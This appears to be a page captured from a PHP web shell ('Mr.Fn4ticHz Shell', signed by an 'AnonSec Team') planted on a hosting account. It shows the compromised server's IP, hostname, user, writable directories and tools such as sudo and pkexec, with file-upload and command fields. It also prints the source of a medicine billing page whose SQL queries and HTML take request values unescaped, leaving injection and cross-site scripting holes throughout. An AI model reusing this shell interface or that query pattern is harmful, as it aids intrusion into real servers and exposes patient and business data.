Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.35.255
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/billing.php
    <?php session_start();
require_once('../dbconnection.php');
include('header.php');
include('dashboarddocument.php');
    if(isset($_POST['signup'])) 
{
$sql="UPDATE medicine_slot SET quantitygiven='$_POST[quantitygiven]' WHERE srno='$_GET[srno]'";
if($qsql = mysqli_query($con,$sql))
		{
		    
	echo "<script>alert('Update successfully');</script><script>
 window.history.go(-2)</script>";
}
}

if(isset($_POST['signup'])) 
{
$medicine_inventory ="UPDATE `medicine_inventory` SET `totalQuatity`='$_POST[upgradeQty]' WHERE inventory_id='$_GET[inventory_id]'";
if($smedicine_inventory = mysqli_query($con,$medicine_inventory))
		{

}
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
   </head>
  <body>
  
  <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
   <form name='signup' method='post'>
       <?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");

		
		include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
 $sql6 ="SELECT * FROM medicinede WHERE Action_med='Disperse'  AND prescriptionid='$_GET[prescriptionid]' OR Action_med='Refuse'  AND prescriptionid='$_GET[prescriptionid]'  ";
		$qsql6 = mysqli_query($con,$sql6);
		$re1 = mysqli_fetch_array($qsql6);
	
	$sql1 ="SELECT * FROM site_users WHERE userno='$re1[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		$re = mysqli_fetch_array($qsql1);
	
		    
		     $x=$re1[durationselect]; $y=$re1[duration]; $w=$re1[Frequency]; 
		  $a=$x*$y;
		  $b=$a*$w;
		   if (is_numeric($re1[DRUGS]))
{
		  $sql ="SELECT * FROM medicine_stok WHERE medicine_id='$_GET[medicine_id]'";
$qsql = mysqli_query($con,$sql);
$re2 = mysqli_fetch_array($qsql);
echo"";
echo"";

		     echo " <tbody>
            <tr>
   
                 <td><b>Name :</b> $re2[DRUGS_name] ($re2[Category]) 
                 <br>";
                 echo"<b>Duration : </b> $re1[duration]  ";
                 
	   
switch ($re1[durationselect]) {
  case '1':
    echo "Days";
    break;
      case '7':
    echo "Week";
    break;
case '28':
    echo "Month";
    break;

        default:
    
}


echo"";
echo"";
$batchName=$con->query("SELECT * FROM medicine_inventory WHERE medicine_id='$_GET[medicine_id]' AND inventory_id='$_GET[inventory_id]'");
$RowBatchNumber=$batchName->fetch_assoc();

    echo " <br>	<b>	Batch No :</b> $RowBatchNumber[Batch_number]";
    
 $slot ="SELECT * FROM `medicine_charge` where id='$_GET[mcid]'";
$qslot = mysqli_query($con,$slot);
$rslot = mysqli_fetch_array($qslot);  

$sql12="SELECT  * FROM medicine_inventory WHERE  inventory_id='$_GET[inventory_id]'";
            $result = $con->query($sql12);
$row = mysqli_fetch_array($result);
    echo " <br>	<b>Total Quantity :</b> $row[totalQuatity]   <br>";
    
    


  $sqlpatient2 = "SELECT * FROM  medicine_slot WHERE prescriptionid='$_GET[prescriptionid]' AND  srno='$_GET[srno]' AND  action='Paid'";
	$qsqlpatient2 = mysqli_query($con,$sqlpatient2);
 if($rsn2 = mysqli_fetch_array($qsqlpatient2)){

	       $sqlpatient21 = "SELECT * FROM  medicine_inventory WHERE  inventory_id='$_GET[inventory_id]' AND Batch_number='$_GET[Batch_number]'";
	$qsqlpatient21 = mysqli_query($con,$sqlpatient21);
 if($rsn21 = mysqli_fetch_array($qsqlpatient21)){

 $disGST=$rsn2[UpgradeAmt]/100;
                $GSTfinal=$disGST*$rsn21[gst]; 
                $GRANDTOTAL=$rsn2[UpgradeAmt];
  
	       $medicine_charge = "SELECT * FROM  medicine_charge WHERE  id='$_GET[mcid]'";
	$qmedicine_charge = mysqli_query($con,$medicine_charge);              
      if($rmedicine_charge = mysqli_fetch_array($qmedicine_charge))          
     echo " <b>Grand Total</b>  :<i class='fa fa-inr'></i> $rmedicine_charge[Price]";
 }}
            echo "</td><td>
            <div style = 'display:none;' id = 'loaderImg'> <div class='loader'> </div> </div>
<form name='FinalDecision' id='myForm' method='POST'>
            ";
            
            
$sql12="SELECT  * FROM medicine_inventory WHERE  inventory_id='$_GET[inventory_id]'";
            $result = $con->query($sql12);
$row = mysqli_fetch_array($result);
  
  $sql2 ="SELECT * FROM medicine_stok WHERE medicine_id='$_GET[medicine_id]'";
$qsql2 = mysqli_query($con,$sql2);
$rs2 = mysqli_fetch_array($qsql2);

    $sql3 ="SELECT * FROM medicine_slot WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  medicine_id='$_GET[medicine_id]'";
$qsql3 = mysqli_query($con,$sql3);
$rs3 = mysqli_fetch_array($qsql3);


    $z=$rs2['size']*$row['SUM(Quantity)'];
    $a=$z-$rs3['upgradeQty'];
    $ret=$rs3['upgradeQty']-$rs3['ReturnQuantity'];
   
   $sql6 ="SELECT * FROM medicine_slot WHERE srno='$_GET[srno]'";
		$qsql6 = mysqli_query($con,$sql6);
		while($re1 = mysqli_fetch_array($qsql6))
		{
		    echo"
       <label>Quantity Given</label> <input name='quantitygiven'  type='number'  onkeyup='sum$_GET[inventory_id]();' style='width:100%;' id='txt1$_GET[inventory_id]'><br>
       
       <input type='hidden' id='txt2$_GET[inventory_id]' value='$re1[quantitygiven]'  onkeyup='sum$_GET[inventory_id]();' style='width:25%;'/><br>
       <input type='hidden' id='txt3$_GET[inventory_id]' name='AddQty'  style='width:25%; color:red' onkeyup='sum$_GET[inventory_id]();'/>
       
       
        <input type='hidden' id='txt4$_GET[inventory_id]' value='$row[totalQuatity]' name='upgradeQty'  onkeyup='sum$_GET[inventory_id]();' style='width:25%;'/>
       ";
		}
  // <input type='text' id='txt2$_GET[inventory_id]' value='$row[totalQuatity]'  onkeyup='sum$_GET[inventory_id]();' style='width:25%;'/><br>          
    echo "




";

echo "
  
   <input type='hidden' name='upgradeQty' id='txt5$_GET[inventory_id]' value='$rmedicine_charge[Quantity]' style='width:25%; color:orange' >";
   
		?>
      
		<input type="submit" value="Update" name="signup">
		</form>
	</div></div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<style>
      #loaderImg {
         position: absolute;
         top: 0;
         bottom: 0;
         left: 0;
         right: 0; 
         margin: auto;
         border: 10px solid grey;
         border-radius: 50%;
         border-top: 10px solid black;
         width: 100px;
         height: 100px;
         animation: spin 1s linear infinite;
         z-index:10000000;
      }
      @keyframes spin {
         0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
         }
         100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
         }
      }
   </style>
    
  </div>
</div>

  
 
     

      
<?php

		}
	
		?>


   


</div>
</div>
 <div class="clear"></div>
  </div>
</div>
<?php
include("footer.php");
?>
         <script>
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
    <script>
 function drugload(drid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divdr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loaddrug.php?drid="+drid,true);
        xmlhttp.send();
}
            
  
</script>

  </body>
</html>
</div>
<?php


	

 $sql12="SELECT  * FROM medicine_inventory where inventory_id=$_GET[inventory_id]";
            $result = $con->query($sql12);
$row = mysqli_fetch_array($result);
   
  $sql2 ="SELECT * FROM medicine_stok WHERE medicine_id='$row[medicine_id]'";
$qsql2 = mysqli_query($con,$sql2);
$rs2 = mysqli_fetch_array($qsql2);

 

?>
<script>
    //   function reSum<?php echo $_GET['inventory_id'] ?>()
    //     {
    //         var num1 = parseInt(document.getElementById("Num1<?php echo $_GET['inventory_id'] ?>").value);
    //         var num2 = parseInt(document.getElementById("Num2<?php echo $_GET['inventory_id'] ?>").value);
    //         document.getElementById("Sum<?php echo $_GET['inventory_id'] ?>").value = num1 + num2;

    //     }
    
    function sum<?php echo $_GET['inventory_id'] ?>() {
            var txtFirstNumberValue = document.getElementById('txt1<?php echo $_GET['inventory_id'] ?>').value;
            var txtSecondNumberValue = document.getElementById('txt2<?php echo $_GET['inventory_id'] ?>').value;
            
            
            var txtFourthNumberValue = document.getElementById('txt4<?php echo $_GET['inventory_id'] ?>').value;
          
            
            
            var result =  parseInt(txtSecondNumberValue)-parseInt(txtFirstNumberValue);
            
            
            var TQty= parseInt(txtFourthNumberValue)+parseInt(result);
            
            
           
            
            if (!isNaN(result)) {
                document.getElementById('txt3<?php echo $_GET['inventory_id'] ?>').value = result;
            }
            if (!isNaN(TQty)) {
                document.getElementById('txt5<?php echo $_GET['inventory_id'] ?>').value = TQty;
            }
             
        }
</script>

<script>
    function Pricesum<?php echo $_GET['inventory_id'] ?>() {
           
            var txtFifthNumberValue = document.getElementById('UpgradeAmt<?php echo $_GET['inventory_id'] ?>').value;
            var txtpriceFinalValue=document.getElementById('priceFinal<?php echo $_GET['inventory_id'] ?>').value;
            
            
        
            var ReturnAmt=parseInt(txtFifthNumberValue)-parseInt(txtpriceFinalValue);
           
            
            if (!isNaN(ReturnAmt)) {
                document.getElementById('NewPrice<?php echo $_GET['inventory_id'] ?>').value = ReturnAmt;
            }
           
        }
    
</script>

<?php  ?>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
    $('#myForm').submit(function() {
     $('#loaderImg').show(); 
      return true;
    });
});
</script>

Anon7 - 2022
AnonSec Team